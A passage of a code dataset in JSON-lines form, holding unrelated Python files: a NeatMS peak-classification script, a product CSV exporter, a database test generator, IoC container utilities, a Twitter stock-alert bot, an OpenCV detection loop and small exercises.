samples\nfeature_table_path = base_path + 'refined_unaligned_feature_table.csv'\n# Using unaligned peaks (One individual peak table for each sample)\n# feature_table_path = '../data/test_data/unaligned_features/'\n# This is important for NeatMS to read the feature table correctly\ninput_data = 'xcms'\n\nexperiment = ntms.Experiment(raw_data_folder_path, feature_table_path, input_data)\n\nfor sample in experiment.samples:\n print('Sample {} : {} peaks'.format(sample.name,len(sample.feature_list)))\n\nfrom collections import Counter\nexp = experiment\nsizes = []\nprint(\"# Feature collection:\",len(exp.feature_tables[0].feature_collection_list))\n\nfor consensus_feature in exp.feature_tables[0].feature_collection_list:\n sizes.append(len(consensus_feature.feature_list))\n\nc = Counter(sizes)\nprint(\"Number of consensus features:\")\nfor size, count in c.most_common():\n print(\" of size %2d : %6d\" % (size, count))\nprint(\" total : %6d\" % len(exp.feature_tables[0].feature_collection_list))\nnn_handler = ntms.NN_handler(experiment)\nprint('Labels:', nn_handler.get_labels())\n\nmodel_path = \"./data/model/neatms_default_model.h5\"\nnn_handler.create_model(model = model_path)\n\n\n# Set the threshold to 0.22\nthreshold=0.22\n# Run the prediction\nnn_handler.predict_peaks(threshold)\n\nfrom collections import Counter\nexp = experiment\nhq_sizes = []\nlq_sizes = []\nn_sizes = []\nsizes = []\nprint(\"# Feature collection:\",len(exp.feature_tables[0].feature_collection_list))\nfor consensus_feature in exp.feature_tables[0].feature_collection_list:\n hq_size = 0\n lq_size = 0\n n_size = 0\n for feature in consensus_feature.feature_list:\n for peak in feature.peak_list:\n if peak.valid:\n if peak.prediction.label == \"High_quality\":\n hq_size += 1\n if peak.prediction.label == \"Low_quality\":\n lq_size += 1\n if peak.prediction.label == \"Noise\":\n n_size += 1\n\n hq_sizes.append(hq_size)\n lq_sizes.append(lq_size)\n n_sizes.append(n_size)\n sizes.append(len(consensus_feature.feature_list))\n\nc = Counter(hq_sizes)\nprint(\"\\nNumber of consensus features labeled as 'High quality':\")\nfor size, count in c.most_common():\n print(\" of size %2d : %6d\" % (size, count))\nprint(\" total : %6d\" % len(exp.feature_tables[0].feature_collection_list))\n\nc = Counter(lq_sizes)\nprint(\"\\nNumber of consensus features labeled as 'Low quality':\")\nfor size, count in c.most_common():\n print(\" of size %2d : %6d\" % (size, count))\nprint(\" total : %6d\" % len(exp.feature_tables[0].feature_collection_list))\n\nc = Counter(n_sizes)\nprint(\"\\nNumber of consensus features labeled as 'Noise':\")\nfor size, count in c.most_common():\n print(\" of size %2d : %6d\" % (size, count))\nprint(\" total : %6d\" % len(exp.feature_tables[0].feature_collection_list))\n\nfilename = base_path+'neatms_export.csv'\n\nexperiment.export_csv(filename)\n# We create the dataframe using this function\nNeatMS_output_df = experiment.export_to_dataframe()\n# And display it\nprint(NeatMS_output_df)\n\n\n# We add those specific properties to the export list\n# Default properties will be overwritten, so make sure to add them to the list as well\nexport_properties = [\"rt\", \"mz\", \"height\", \"area\", \"label\", \"peak_rt_start\", \"peak_rt_end\"]\n\n# Here is the full list of available properties that you can export\n# [\"rt\", \"mz\", \"height\", \"area\", \"label\", \"peak_rt_start\", \"peak_rt_end\", \"peak_mz_min\", \"peak_mz_max\", \"area_bc\", \"sn\"]\n\nNeatMS_output_df = experiment.export_to_dataframe(export_properties = export_properties)\n\nprint(NeatMS_output_df)\n\nfilename = base_path+'neatms_export_with_extra_properties.csv'\n\nexperiment.export_csv(filename, export_properties = export_properties)\n\n\n","sub_path":"test_neatms_metacleant2.py","file_name":"test_neatms_metacleant2.py","file_ext":"py","file_size_in_byte":3915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"475535316","text":"# Add current year, month and day to list\nfrom datetime import date\n\nyearToday= date.today().year\nmonth = date.today().month\nday = date.today().isoweekday()\n\n\nlist1 = []\n\nlist1.append(yearToday)\nlist1.append(month)\nlist1.append(day)\n\nprint(list1)\n","sub_path":"date_to_list.py","file_name":"date_to_list.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"463036798","text":"import os\nimport sys\nimport json\nimport csv\nimport datetime\nimport traceback\n#クラスファイルがスクリプトと同一ディレクトリにないと動かないんだけどなぜ?\nfrom database import Database\nfrom spec_info import *\nfrom content import *\nfrom creation_date import *\nfrom constant import *\nfrom fileserver_connect import *\nfrom logger import *\n# CSV入力/出力設定の読み込み\n\nlog = logger(logger)\n\nlog.info(\"処理を開始します。\")\n\nConnect.fileserver()\n\n#csv_settings.jsonの読み込み\ntry:\n s5_csv_settings = json.load(open(\".\\\\etc\\\\csv_settings.json\", \"r\"))\n s5_index = s5_csv_settings[\"s5\"][\"input\"]\nexcept:\n log.error(\"「csv_settings.json」の読み込み時に例外が発生しました。\")\n log.error(sys.exc_info())\n traceback.print_exc()\n sys.exit(False)\nelse:\n log.info(\"「csv_settings.json」を読み込みました。\")\n\n#brand.jsonの読み込み\ntry:\n brand_csv_settings = json.load(open(\".\\\\etc\\\\brand.json\", \"r\" ))\n brand_kana = brand_csv_settings[\"brand\"][\"kana\"]\nexcept:\n log.error(\"「brand.json」の読み込み時に例外が発生しました。\")\n log.error(sys.exc_info())\n traceback.print_exc()\n sys.exit(False)\nelse:\n log.info(\"「brand.json」を読み込みました。\")\n\n# 対象商品一覧CSVを読み込み\ntry:\n csv_file = open(\n \".\\\\s5.csv\", \"r\", encoding=\"shift_jis\", errors=\"\", newline=\"\"\n )\n csv_list = csv.reader(\n csv_file, delimiter=\",\", doublequote=True,\n lineterminator=\"\\r\\n\", quotechar='\"', skipinitialspace=True\n )\nexcept:\n log.error(\"「s5.csv」の読み込み時に例外が発生しました。\")\n log.error(sys.exc_info())\n traceback.print_exc()\n sys.exit(False)\nelse:\n log.info(\"「s5.csv」を読み込みました。\")\n\n#インスタンス化\ndb = Database()\npd = Productdetail()\n\nlog.info(\"「s5.csv」へのデータ出力を開始します。\")\n\nwith open(\".\\\\test.csv\", \"w\", newline=\"\") as test: \n\n i = 1\n # データ抽出/加工\n for line in csv_list:\n\n output_array = []\n #MST_ITEMをselect\n item = db.sql_execute(\"MST_ITEM\", \"ITEM_CODE\", line[s5_index[\"lis_item_code\"]])\n\n #MST_BRANDをselect\n brand = db.sql_execute(\"MST_BRAND\", \"BRAND_CODE\", item[\"BRAND_CODE\"])\n\n #MST_ITEM_INCIDENTAL1をselect\n incidental = db.sql_execute(\"MST_ITEM_INCIDENTAL1\", \"ITEM_CODE\", line[s5_index[\"lis_item_code\"]])\n\n #\n text = pd.create_tagging(item, incidental)\n image_value = Content.image_name_change(int(line[s5_index[\"image_number\"]]), line[s5_index[\"lis_item_code\"]])\n serial_date = Date.date_change(i)\n standard = Date.create_standard(item[\"ITEM_NAME\"], item[\"STANDARD\"])\n\n output_array.extend([\n line[s5_index[\"s5_item_code\"]],\n delivery_code,\n icon_image_code,\n expiration_date,\n classification_code,\n standard,\n brand[\"BRAND_NAME\"],\n serial_date,\n \"\", \n line[s5_index[\"lis_item_code\"]],\n active_gateway,\n text, #LISのデータにHTMLタグ適当につけた\n image_value, #品番の後ろの連番どうする?\n \"\",\n \"\",\n \"\",\n \"\",\n \"%s,%s,%s\" % (brand[\"BRAND_NAME\"], brand_kana[brand[\"BRAND_NAME\"]], line[s5_index[\"lis_item_code\"]]), #ブランドカナ名設定ファイルで取得してる。\n \"\",\n round(item[\"RETAIL\"] * tax),\n \"\",\n \"false\"\n ])\n\n try:\n writer = csv.writer(test, lineterminator=\"\\r\\n\") #quoting=csv.QUOTE_NONE, escapechar=' ', quotechar=' '\n writer.writerow(output_array)\n except:\n log.error(\"「s5.csv」へのデータ出力時に%d行目で例外が発生しました。\" % i)\n log.error(sys.exc_info())\n traceback.print_exc()\n sys.exit(False)\n else:\n log.info(\"%d行目のデータが出力されました。\" % i)\n finally:\n i += 1\n\nlog.info(\"処理が終了しました。\")","sub_path":"bin/create_products_csv_for_s5.py","file_name":"create_products_csv_for_s5.py","file_ext":"py","file_size_in_byte":4251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"115682053","text":"from collections import OrderedDict\nfrom typing import List\nfrom Column import Column\nfrom Table import Table\nfrom Connection import Connection\n\nfrom Model import Model\nfrom DbErrors import DbNoConnection\n\n\nclass Database(Model):\n\n def __init__(self, name: str, main, connection: Connection):\n super().__init__()\n self._name = name\n self.main = main\n self.connection = connection\n self._tables = OrderedDict()\n self._tables_to_gen = set(self._tables.keys())\n self._size = len(self._tables)\n self.test_db_name = 'test_{}'.format(self.name)\n\n @property\n def name(self):\n return self._name\n\n @property\n def tables(self) -> iter:\n return self._tables\n\n def tables_to_gen(self):\n return self._tables_to_gen\n\n def size(self):\n return self._size\n\n def table(self, name: str):\n return self.tables[name]\n\n def check_table(self, name: str):\n if name in self._tables.keys():\n self._tables_to_gen.add(name)\n else:\n raise KeyError\n\n def uncheck_table(self, name: str):\n if name in self._tables.keys():\n del self._tables_to_gen[name]\n\n def update(self):\n upd_tables = OrderedDict()\n table_names = self.list_tables()\n\n for table_name in table_names:\n if table_name in self._tables:\n upd_tables[table_name] = self.table(table_name)\n else:\n upd_tables[table_name] = Table(\n table_name, self, self.connection)\n\n upd_tables[table_name].update()\n self._tables = upd_tables\n\n def list_tables(self):\n if self.connection.db is None:\n raise DbNoConnection\n self.connection.cur.execute(r\"SHOW TABLES FROM `{}`\".format(self.name))\n data = self.connection.cur.fetchall()\n tables = (x[0] for x in data)\n return tables\n\n def __repr__(self):\n tables = ''\n for table_name in self.tables.keys():\n tables += '\\n\\t{}'.format(self.table(table_name))\n return 'Database(name={0}, tables:{1})'.format(self.name, tables)\n\n def create_test_db(self):\n self.connection.cur.execute(\n r\"CREATE DATABASE `{}`\".format(self.test_db_name))\n\n def make_query(self, query):\n if self.connection.db is None:\n raise DbNoConnection\n self.connection.cur.execute(r\"USE `{}`\".format(self.name))\n print(\"Database: {0}. Query: {1}\".format(self.name, query))\n self.connection.cur.execute(query)\n\n def make_gen_query(self, query):\n if self.connection.db is None:\n raise DbNoConnection\n self.connection.cur.execute(r\"USE `{}`\".format(self.test_db_name))\n print(\"Database: {0}. Query: {1}\".format(self.test_db_name, query))\n self.connection.cur.execute(query)\n\n def generate(self):\n self.create_test_db()\n self.make_gen_query(\"SET FOREIGN_KEY_CHECKS=0;\")\n print(\"------------------Create tables------------------\")\n create_tables = \"\"\n for table in self.tables.values():\n create_tables += \"{};\\n\".format(table.create_table_script())\n print(\"-------------------Tables created----------------\")\n print(create_tables)\n\n self.make_gen_query(create_tables)\n \n self.connection.db.commit()\n self.make_gen_query(\"SET FOREIGN_KEY_CHECKS=1;\")\n self.connection.db.commit()\n # generate tables with null fkeys\n for table in self.tables.values():\n table.generate()\n self.connection.db.commit()\n self.connection.db.commit()\n # update table with values\n for table in self.tables.values():\n if not table.fkeys:\n continue\n print(table.name + \"FKEY\")\n table.update_table_fkeys()\n self.connection.db.commit()\n self.connection.db.commit()\n","sub_path":"Database.py","file_name":"Database.py","file_ext":"py","file_size_in_byte":3952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"118629164","text":"import cv2 \n\n#Pre trained model\nface_model = cv2.CascadeClassifier('../models/haarcascade_fullbody.xml')\nvideo = cv2.VideoCapture(0)\ncount = 1\nwhile(True):\n status, frame = video.read()\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n faces = face_model.detectMultiScale(gray, scaleFactor=1.5, minNeighbors=5)\n for (x, y, w, h) in faces:\n print('x: %s| y: %s | w: %s| h: %s'%(x,y,w,h))\n #BGR Color Frame\n color = (0, 255, 0) \n rectangle_thickness = 2\n cv2.rectangle(frame, (x, y), (x+w, y+h), color, rectangle_thickness)\n\n cv2.imshow('captching ...', frame)\n key = cv2.waitKey(3)\n if key == ord('q'):\n break\n \nvideo.release()\ncv2.destroyAllWindows()\n","sub_path":"detectFace/fullbody.py","file_name":"fullbody.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"206324062","text":"'''\nCreated on Jan 12, 2012\n\n@package: Newscoop\n@copyright: 2011 Sourcefabric o.p.s.\n@license: http://www.gnu.org/licenses/gpl-3.0.txt\n@author: Gabriel Nistor\n\nProvides support functions for the container.\n'''\n\nfrom ..support.util_sys import callerLocals, callerGlobals\nfrom ._impl.aop_container import AOPClasses, AOPResources\nfrom ._impl.entity_handler import Wiring, WireConfig\nfrom ._impl.ioc_setup import ConfigError, register, SetupConfig, setupsOf, \\\n setupFirstOf, SetupStart\nfrom ._impl.support_setup import CreateEntity, SetupError, SetupEntityProxy, \\\n SetupEntityWire, Assembly, CallEntity, SetupEntityCreate\nfrom .aop import classesIn\nfrom ally.container._impl.support_setup import SetupEntityListen, \\\n SetupEntityListenAfterBinding\nfrom copy import deepcopy\nfrom functools import partial\nfrom inspect import isclass, ismodule, getsource\n\n# --------------------------------------------------------------------\n# Functions available in setup modules.\n\ndef createEntitySetup(api, *impl, formatter=lambda group, clazz: group + '.' + clazz.__name__, setupModule=None):\n '''\n Creates entity setup functions for the provided API classes. The name of the setup functions that will be generated\n are formed based on the provided formatter.\n To create a setup function a class from the impl classes has to inherit at least one of the api classes then it will\n create a setup function based on the api class that will create an instance of the impl class. If a impl class\n inherits multiple api classes than for each one of the api class a setup function is generated, all setup function\n will provide the same impl instance. If an api class is already delivered by a different call than no create entity\n setup will made for that implementation, the idea is if you defined a setup function in the setup module that will\n deliver an instance for that api class it means it should not be created again.\n \n @param api: string|class|AOPClasses|tuple(string|class|AOPClasses)|list(string|class|AOPClasses)\n The classes to be considered as the APIs for the setup functions.\n @param impl: arguments(string|class|AOPClasses)\n The classes to be considered the implementations for the APIs.\n @param formatter: Callable\n The formatter to use in creating the entity setup function name, the Callable will take two arguments, first is\n the group where the setup function is defined and second the class for wich the setup is created. \n @param setupModule: module|None\n If the setup module is not provided than the calling module will be considered.\n '''\n assert callable(formatter), 'Invalid formatter %s' % formatter\n if setupModule:\n assert ismodule(setupModule), 'Invalid setup module %s' % setupModule\n registry = setupModule.__dict__\n group = setupModule.__name__\n else:\n registry = callerLocals()\n if '__name__' not in registry:\n raise SetupError('The create entity call needs to be made directly from the module')\n group = registry['__name__']\n apis = _classes(api if isinstance(api, (tuple, list)) else [api])\n wireClasses = []\n for clazz in _classes(impl):\n apiClasses = [apiClass for apiClass in apis if issubclass(clazz, apiClass)]\n if apiClasses:\n # We need to trim the API classes to the top ones.\n while True:\n topApis = []\n for k in range(0, len(apiClasses) - 1):\n for j in range(k + 1, len(apiClasses)):\n if issubclass(apiClasses[j], apiClasses[k]): break\n else: topApis.append(apiClasses[k])\n if not topApis: break\n apiClasses = topApis\n\n wireClasses.append(clazz)\n create = CreateEntity(clazz)\n for apiClass in apiClasses:\n register(SetupEntityCreate(create, apiClass, name=formatter(group, apiClass), group=group), registry)\n wireEntities(*wireClasses, setupModule=setupModule)\n\ndef wireEntities(*classes, setupModule=None):\n '''\n Creates entity wiring setups for the provided classes. The wiring setups consists of configurations found in the\n provided classes that will be published in the setup module.\n \n @param classes: arguments(string|class|AOPClasses)\n The classes to be wired.\n @param setupModule: module|None\n If the setup module is not provided than the calling module will be considered.\n '''\n def processConfig(clazz, wconfig):\n assert isclass(clazz), 'Invalid class %s' % clazz\n assert isinstance(wconfig, WireConfig), 'Invalid wire configuration %s' % wconfig\n value = clazz.__dict__.get(wconfig.name, None)\n if value and not isclass(value): return deepcopy(value)\n if wconfig.hasValue: return deepcopy(wconfig.value)\n raise ConfigError('A configuration value is required for %r in class %r' % (wconfig.name, clazz.__name__))\n\n if setupModule:\n assert ismodule(setupModule), 'Invalid setup module %s' % setupModule\n registry = setupModule.__dict__\n group = setupModule.__name__\n else:\n registry = callerLocals()\n if '__name__' not in registry:\n raise SetupError('The create wiring call needs to be made directly from the module')\n group = registry['__name__']\n wirings = {}\n for clazz in _classes(classes):\n wiring = Wiring.wiringOf(clazz)\n if wiring:\n wirings[clazz] = wiring\n assert isinstance(wiring, Wiring)\n for wconfig in wiring.configurations:\n assert isinstance(wconfig, WireConfig)\n name = SetupEntityWire.nameFor(group, clazz, wconfig)\n for setup in setupsOf(registry, SetupConfig):\n assert isinstance(setup, SetupConfig)\n if setup.name == name: break\n else:\n configCall = partial(processConfig, clazz, wconfig)\n configCall.__doc__ = wconfig.description\n register(SetupConfig(configCall, type=wconfig.type, name=name, group=group), registry)\n if wirings:\n wire = setupFirstOf(registry, SetupEntityWire)\n if wire:\n assert isinstance(wire, SetupEntityWire)\n wire.update(wirings)\n else: register(SetupEntityWire(group, wirings), registry)\n\ndef listenToEntities(*classes, listeners=None, setupModule=None, beforeBinding=True):\n '''\n Listens for entities defined in the provided module that are of the provided classes. The listening is done at the \n moment of the entity creation so the listen is not dependent of the declared entity return type.\n \n @param classes: arguments(string|class|AOPClasses)\n The classes to listen to, this classes can be either the same class or a super class of the instances generated\n by the entity setup functions.\n @param listeners: None|Callable|list[Callable]|tuple(Callable)\n The listeners to be invoked. The listeners Callable's will take one argument that is the instance.\n @param setupModule: module|None\n If the setup module is not provided than the calling module will be considered.\n @param beforeBinding: boolean\n Flag indicating that the listening should be performed before any binding occurs (True) or after the\n bindings (False).\n '''\n if not listeners: listeners = []\n elif not isinstance(listeners, (list, tuple)): listeners = [listeners]\n assert isinstance(listeners, (list, tuple)), 'Invalid listeners %s' % listeners\n assert isinstance(beforeBinding, bool), 'Invalid before binding flag %s' % beforeBinding\n if setupModule:\n assert ismodule(setupModule), 'Invalid setup module %s' % setupModule\n registry = setupModule.__dict__\n group = setupModule.__name__\n else:\n registry = callerLocals()\n if '__name__' not in registry:\n raise SetupError('The create proxy call needs to be made directly from the module')\n group = registry['__name__']\n\n if beforeBinding: setup = SetupEntityListen(group, _classes(classes), listeners)\n else: setup = SetupEntityListenAfterBinding(group, _classes(classes), listeners)\n register(setup, registry)\n\ndef bindToEntities(*classes, binders=None, setupModule=None):\n '''\n Creates entity implementation proxies for the provided entities classes found in the provided module. The binding is\n done at the moment of the entity creation so the binding is not dependent of the declared entity return type.\n \n @param classes: arguments(string|class|AOPClasses)\n The classes to be proxied.\n @param binders: None|Callable|list[Callable]|tuple(Callable)\n The binders to be invoked when a proxy is created. The binders Callable's will take one argument that is the newly\n created proxy instance.\n @param setupModule: module|None\n If the setup module is not provided than the calling module will be considered.\n '''\n if not binders: binders = []\n elif not isinstance(binders, (list, tuple)): binders = [binders]\n assert isinstance(binders, (list, tuple)), 'Invalid binders %s' % binders\n if setupModule:\n assert ismodule(setupModule), 'Invalid setup module %s' % setupModule\n registry = setupModule.__dict__\n group = setupModule.__name__\n else:\n registry = callerLocals()\n if '__name__' not in registry:\n raise SetupError('The create proxy call needs to be made directly from the module')\n group = registry['__name__']\n register(SetupEntityProxy(group, _classes(classes), binders), registry)\n\ndef loadAllEntities(*classes, setupModule=None):\n '''\n Loads all entities that have the type in the provided classes.\n \n @param classes: arguments(string|class|AOPClasses)\n The classes to have the entities loaded for.\n @param setupModule: module|None\n If the setup module is not provided than the calling module will be considered.\n '''\n def loadAll(prefix, classes):\n for clazz in classes:\n for name, call in Assembly.current().calls.items():\n if name.startswith(prefix) and isinstance(call, CallEntity) and call.type and \\\n (call.type == clazz or issubclass(call.type, clazz)): Assembly.process(name)\n\n if setupModule:\n assert ismodule(setupModule), 'Invalid setup module %s' % setupModule\n registry = setupModule.__dict__\n group = setupModule.__name__\n else:\n registry = callerLocals()\n if '__name__' not in registry:\n raise SetupError('The create proxy call needs to be made directly from the module')\n group = registry['__name__']\n\n loader = partial(loadAll, group + '.', _classes(classes))\n register(SetupStart(loader, name='loader_%s' % id(loader)), registry)\n\ndef include(module, setupModule=None):\n '''\n By including the provided module all the setup functions from the the included module are added as belonging to the\n including module, is just like defining the setup functions again in the including module.\n \n @param module: module\n The module to be included.\n @param setupModule: module|None\n If the setup module is not provided than the calling module will be considered.\n '''\n assert ismodule(module), 'Invalid module %s' % module\n\n if setupModule:\n assert ismodule(setupModule), 'Invalid setup module %s' % setupModule\n registry = setupModule.__dict__\n else: registry = callerLocals()\n exec(compile(getsource(module), registry['__file__'], 'exec'), registry)\n\n# --------------------------------------------------------------------\n# Functions available in setup functions calls.\n\ndef entities():\n '''\n !Attention this function is only available in an open assembly @see: ioc.open!\n Provides all the entities references found in the current assembly wrapped in a AOP class.\n \n @return: AOP\n The resource AOP.\n '''\n return AOPResources({name:name for name, call in Assembly.current().calls.items() if isinstance(call, CallEntity)})\n\ndef entitiesLocal():\n '''\n !Attention this function is only available in an open assembly @see: ioc.open!\n Provides all the entities references for the module from where the call is made found in the current assembly.\n \n @return: AOP\n The resource AOP.\n '''\n registry = callerGlobals()\n if '__name__' not in registry:\n raise SetupError('The create call needs to be made from a module function')\n rsc = AOPResources({name:name for name, call in Assembly.current().calls.items() if isinstance(call, CallEntity)})\n rsc.filter(registry['__name__'] + '.**')\n return rsc\n\ndef entitiesFor(clazz, assembly=None):\n '''\n !Attention this function is only available in an open assembly @see: ioc.open!\n Provides the entities for the provided class (only if the setup function exposes a return type that is either the\n provided class or a super class) found in the current assembly.\n \n @param clazz: class\n The class to find the entities for.\n @param assembly: Assembly|None\n The assembly to find the entities in, if None the current assembly will be considered.\n @return: list[object]\n The instances for the provided class.\n '''\n assert isclass(clazz), 'Invalid class %s' % clazz\n assembly = assembly or Assembly.current()\n assert isinstance(assembly, Assembly), 'Invalid assembly %s' % assembly\n\n entities = (name for name, call in assembly.calls.items()\n if isinstance(call, CallEntity) and call.type and (call.type == clazz or issubclass(call.type, clazz)))\n\n Assembly.stack.append(assembly)\n try: return [assembly.processForName(name) for name in entities]\n finally: Assembly.stack.pop()\n\ndef entityFor(clazz, assembly=None):\n '''\n !Attention this function is only available in an open assembly @see: ioc.open!\n Provides the entity for the provided class (only if the setup function exposes a return type that is either the\n provided class or a super class) found in the current assembly.\n \n @param clazz: class\n The class to find the entity for.\n @param assembly: Assembly|None\n The assembly to find the entity in, if None the current assembly will be considered.\n @return: object\n The instance for the provided class.\n @raise SetupError: In case there is no entity for the required class or there are to many.\n '''\n assert isclass(clazz), 'Invalid class %s' % clazz\n assembly = assembly or Assembly.current()\n assert isinstance(assembly, Assembly), 'Invalid assembly %s' % assembly\n\n entities = [name for name, call in assembly.calls.items()\n if isinstance(call, CallEntity) and call.type and (call.type == clazz or issubclass(call.type, clazz))]\n if not entities:\n raise SetupError('There is no entity setup function having a return type of class or subclass %s' % clazz)\n if len(entities) > 1:\n raise SetupError('To many entities setup functions %r having a return type of class or subclass %s' %\n (', '.join(entities), clazz))\n\n Assembly.stack.append(assembly)\n try: return assembly.processForName(entities[0])\n finally: Assembly.stack.pop()\n\n# --------------------------------------------------------------------\n\ndef _classes(classes):\n '''\n Provides the classes from the list of provided class references.\n \n @param classes: list(class|AOPClasses)|tuple(class|AOPClasses)\n The classes or class reference to pull the classes from.\n @return: list[class]\n the list of classes obtained.\n '''\n assert isinstance(classes, (list, tuple)), 'Invalid classes %s' % classes\n clazzes = []\n for clazz in classes:\n if isinstance(clazz, str):\n clazzes.extend(classesIn(clazz).asList())\n elif isclass(clazz): clazzes.append(clazz)\n elif isinstance(clazz, AOPClasses):\n assert isinstance(clazz, AOPClasses)\n clazzes.extend(clazz.asList())\n else: raise SetupError('Cannot use class %s' % clazz)\n return clazzes\n","sub_path":"components/ally-utilities/ally/container/support.py","file_name":"support.py","file_ext":"py","file_size_in_byte":16271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"126886041","text":"import json\r\nimport schedule\r\nimport company\r\nimport smtplib\r\nimport logging\r\n\r\nfrom time import sleep\r\nfrom twitter import Twitter\r\nfrom datetime import datetime\r\n\r\n\r\n# Sets up logging info\r\nlogging.basicConfig(filename='./Files/logs.txt', level=logging.DEBUG,\r\n format='%(asctime)s :~: %(funcName)s :~: %(message)s')\r\n\r\n\r\nwith open(\"./Files/config.json\", \"r\") as f:\r\n config = json.load(f)\r\n\r\n# Boolean value\r\nINITIAL_START = config[\"InitialStart\"]\r\n\r\n# Email/Password info\r\nEMAIL = config[\"EmailInfo\"][\"Email\"]\r\nPASSWORD = config[\"EmailInfo\"][\"Password\"]\r\n\r\n# Twitter keys/names\r\nTWITTER_HANDLES = config[\"TwitterAuth\"][\"Handles\"]\r\n\r\n\r\ndef email(handle, matches):\r\n \"\"\"Emails a list of people\"\"\"\r\n\r\n company_output = ', '.join([comp.upper() for comp in matches])\r\n\r\n try:\r\n with open('./Files/emails.txt') as f:\r\n email_list = f.read().split()\r\n\r\n server = smtplib.SMTP('smtp.gmail.com', 587)\r\n server.starttls()\r\n server.login(EMAIL, PASSWORD)\r\n server.sendmail(EMAIL, email_list,\r\n f'{handle} just tweeted about {company_output}. '\r\n f'Might be time to check your shares...')\r\n server.quit()\r\n\r\n except smtplib.SMTPResponseException as error:\r\n logging.debug(error)\r\n\r\n\r\ndef initial_start():\r\n print(\"Welcome to the Twitter Stock Monitor!\")\r\n twitter_handles = input(\"Enter the Twitter handles you want this bot to follow, separated by spaces: \\n\").split()\r\n\r\n with open('./Files/config.json') as json_f:\r\n json_data = json.load(json_f)\r\n\r\n json_data[\"TwitterAuth\"][\"Handles\"] = twitter_handles\r\n json_data[\"InitialStart\"] = False\r\n\r\n with open('./Files/config.json', 'w') as json_f:\r\n json.dump(json_data, json_f, sort_keys=True, indent=4, ensure_ascii=False)\r\n\r\n print(\"Creating files needed..\")\r\n\r\n for handle in twitter_handles:\r\n with open(f'./Files/LatestTweets/{handle}.txt', \"w\") as f:\r\n continue\r\n\r\n print(f'Files created! This bot will now begin to monitor: {twitter_handles}\\n\\n\\n')\r\n\r\n return twitter_handles\r\n\r\n\r\ndef main():\r\n # Checks if this is the first time running the script\r\n # Allows the user to choose the Twitter Handles to follow\r\n # Sets the TWITTER_HANDLES which is an empty list, to the new updated list\r\n if INITIAL_START:\r\n handles = initial_start()\r\n else:\r\n handles = TWITTER_HANDLES\r\n\r\n # Sets up share_output job\r\n twit = Twitter()\r\n schedule.every().day.at(\"18:17\").do(twit.share_output)\r\n schedule.every(15).minutes.do(company.current_day)\r\n\r\n while True:\r\n for handle in handles:\r\n twitter = Twitter(handle)\r\n\r\n new_tweet = twitter.get_latest_tweet()\r\n\r\n # Checks if a new tweet has been posted\r\n # If it has, checks for companies within the tweet\r\n if new_tweet:\r\n matches = company.check_for_companies(new_tweet, handle)\r\n\r\n # If there is a company mentioned\r\n if matches:\r\n # Gets the initial company info\r\n company.get_initial_company_info()\r\n\r\n # Outputs the matches via twitter/email\r\n twitter.initial_tweet(matches)\r\n email(handle, matches)\r\n\r\n # Checks mentions for sign ups/removals\r\n twitter.check_mentions()\r\n\r\n # Gets current share price for each company being monitored\r\n # Checks if there are any schedules to be run\r\n company.get_current_shares()\r\n schedule.run_pending()\r\n\r\n now = datetime.now()\r\n print(f'Running: {now.hour}:{now.minute} - {now.day}/{now.month}/{now.year}')\r\n sleep(10)\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"602881429","text":"\r\nnum = sum = cont = 0\r\n\r\nwhile num != 666:\r\n num = int(input('Digite um numero: '))\r\n if num == 666:\r\n break\r\n sum += num\r\n cont = cont + 1\r\nprint(f' foram digitados {cont} numeros e a soma de todos numeros e igual a {sum}')\r\n","sub_path":"ex066.py","file_name":"ex066.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"415605353","text":"import time as tm\nimport datetime as d\nfilename=\"results(dist).out\"\n\ndef weightInit(w):\n y=open(str(filename),'a')\n y.write(' Init weight values:'+str(w)+\"\\n\")\n y.close()\n\ndef epochopener(w):\n time=d.datetime.now()\n current_time=time.strftime(\"%H:%M:%S\")\n current_date=time.date()\n y=open(str(filename),\"w\")\n y.write(\" ©Nastos Vasileios 2020 ARTA\\n\")\n y.write(\" Execute Perceptron Algorithm using Euclidean Distance Between the initial weights and the last weights of every epoch\\n\")\n y.write(\" File created at:\"+str(current_time)+\"--\"+str(current_date)+\"\\n\")\n y.close()\n weightInit(w)\n y=open(str(filename),\"a\")\n y.write(\"---------------------------------------------------\\n\")\n y.write(\"\\tNUMBER_SEQUENCE(e)\\tEPOCHS\\n\")\n y.close()\n\ndef saver(e,epochs):\n y=open(str(filename),\"a\")\n y.write(\" \\t\"+str(e)+\"\\t \\t\\t\\t \"+str(epochs)+\"\\n\")\n y.close()","sub_path":"perceptron/PERCPTON_EUCLIDEIAN/epochsaver.py","file_name":"epochsaver.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"59451455","text":"import numpy as np\nfrom scipy.integrate import ode\nfrom scipy.optimize import root\nfrom elasticity.Spatial import exp\nclass TwoTubesPlanar(object):\n \"\"\" Simulation class for a planar two tube robot.\n\n Attributes:\n k1b (int): What is this?\n\n\n Todo:\n * abc\n \"\"\"\n def __init__(self, k1b=None, k1t=None, k2b=None, k2t=None, kappa1=None, kappa2=None):\n\n if not k1b or not k1t:\n # Inner tube\n G1 = 21.5e9\n E1 = 58e9\n r_o1 = 2.39e-3 # Outer radius\n r_i1 = 2.01e-3 # Inner radius\n k1b = E1 * np.pi / 4 * (r_o1**4 - r_i1**4)\n k1t = G1 * np.pi / 2 * (r_o1**4 - r_i1**4)\n\n if not k2b or not k2t:\n # Inner tube\n G2 = 21.5e9\n E2 = 